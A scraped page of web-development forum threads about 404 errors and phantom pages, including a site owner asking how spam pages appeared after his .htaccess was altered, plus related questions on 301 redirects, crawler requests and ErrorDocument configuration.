Someone had changed my .htaccess, and I have removed that.
But I still have phantom pages like this:
http://www.biztalk-training.com/?puqr=usoe
I don't have any 404.php, 404.shtml, or 404.html pages.
I checked CPanel for redirects on 404, and it looked empty (but would have created a 404.shtml if I filled it in).
If I type in something like this in the browser, I get a 404;
http://biztalk-training.com/anything.html
I'm looking for what to kill, remove or fix to get red of the phantom page. I'm a developer (other platforms) with moderate familiarity with PHP and CPanel sites. I'm used to seeing domainname.com/progname.php?parm=test and I know how that works. But I don't know how the ?puqr=usoe is producing content on my site. They have other pages similar discovered by doing a site: search on google.
Thanks,
Neal Walters
Have you checked your index page? Under normal circumstances, http://www.example.com/?foo=bar will pass the query string (?foo=bar) to the index of example.com and will not produce a 404.
If these malcontents got write access to your server - and it sounds like they did - they could have easily modified your index page.
Related
I'm working on an old project based on Joomla 1.5. Most of its code was written in core php but it does have SEO URLs. I'm required remove dead links (about 2000 URLs) from the site as it is lowering our organic reach.
When I opened each of them, they showed me the 404 Error page of the site. I couldn't figure out what was wrong with that. After all, that's why we have 404 pages, right? .. to display errors when a link is not found over our server, right?
I tried cleaning up Server's Cache and even purging expired cache after reading some tuts. Now that it doesn't seem to help, I'm not sure what to do! So, any helps?
Btw, site is at www.parentune.com
and an example dead link is: http://www.parentune.com/parenting-blog/category/Adoption/latest
You don't have something to remove as it doesn't exist in your site.
You have to create 301 redirects for old url to new to help search engine crawl your updated content.
A 301 redirect example is:
Redirect 301 /oldpage.html /newpage.html
Good Luck!
As I didn't have any new URLs to redirect those old URLs to, but had the list of those reported URLs in an excel file, so what I did is I read the Excel file in an array and matched if $_SERVER['REQUEST_URI'] was in that array (obviously, all the URLs in that array have to be relative to index page). If the URL was found in the array, I simply redirected the page to homepage.
I also cross checked then on brokenlinkcheck.com and then it didn't report those URLs again as 404 URLs. So, seems like the approach fitted as solution! :D
I recently made some major changes to an ecommerce website that include url structure. The url to view a product is modified by .htaccess and contains a short product description that if changed will not affect the results on the page.
example: www.Example.com/staticFolder/non-deterministic-product-details/MODEL#.html
Now in the error log file I am seeing bingbot requesting pages like example.com/non-deterministic-product-details
Our sitemaps don't link to this page and I am not able to find any bad links on pages. Has anyone else had problems with bingbot doing this? I found another question that was locked for being random. Bingbot causing 404 errors. Is it more likely that I am doing something wrong? Should I avoid using psuedo directories in my .htaccess?
-Thanks
There's nothing requiring that spiders stick only to link-crawling. It's entirely possible it's guessing URLs which are similar to known ones in the hope that it'll find something.
At any rate, I wouldn't worry about it unless you know it's following a bad link. It's quite normal to get lots of requests for non-existent pages.
I am creating an application in PHP.
One thing I want to do is make it so that if a user types in www.example.com/app/rrr.php where app is the main directory of my application and rrr.php does not exist, that either the program does not go anywhere or use ErrorDocuments in .htaccess to redirect back to the previous page. Thus far the only way I have been able to get this is to add this in my .htaccess:
ErrorDocument 404 C:\Users\Chris\Desktop\wamp\www\Master\errorcode.php
When I try to go to a page that does not exist (by typing in the address area), the program does not attempt to go to it. On a page that does exist (if I type in a php file that I have made) the program advances normally. My problem is that I doubt this will work for users who install it themselves, and I was wondering if anyone had ideas as to how to make this work for everyone.
Couln't understand your question fully, but what I think is,
You should direct user to 404 page where you will check if there is any referer then give a link along with 404 page something like You might want to go back, and if there is no referer just show 404 page.
Say I have a website http://site.com. When a user surfs a non-existing page http://site.com/whatever.html, a default 404 page http://site.com/default.php is displayed.
How can I get what the user tried to surf? (get whateve.html in this case).
Is this a common feature?
Its in the Apache/Nginx error logs.
You can grep the file for 404
The answer might vary depending upon the server that you are using. For common servers like Apache & Nginx - if you type in http://site.com/whatever.html & if whatever.html doesn't exist then the content of 404 page (set in server configurations) will be displayed , but the URL location will be the same whatever.html.
If you want to pass parameters to your 404 page, you can try something like Regex to get your catched/matched value & pass it to 404 page, but I can't give you an exact answer since it depends upon which server you are using. Do let us know if this works or this is what you were looking for, will try to help more.
Using $_SERVER['REQUEST_URI'], you should get the filename the user requested.
I have a problem.
I ma moving a system from one server to another and I came across a peculiar problem. There are some pages placed in a subfolder like these:
xttp://test.domain.com/admin/oders.php
xttp://test.domain.com/admin/users.php
xttp://test.domain.com/admin/whatever.php
Now, when I move around the pages, via some simple menu with links I get most of the times correct hits. But from time to time I end up on say:
xttp://test.domain.com/admin/admin/oders.php - which obviously causes 404
When I go back to previous page and press the link again it again works all right. Also when I hover over the links they always show proper paths regardless of whether I am going to get 404 or not. All links are dynamically generated by the scripts but they work perfectly on old server and as I say to a naked eye it all looks OK, right until I press the link.
Anyone has an idea where to look for a bug or which tool to use to see what is happening when I press the link? URL mod rewrite? Domain configuration? I am at a loss.
It sounds like the scripts are getting confused between
[xttp://test.domain.com]/admin/file.php
admin/file.php
file.php
Without seeing how the URLs are generated it's impossible to say how this is happening.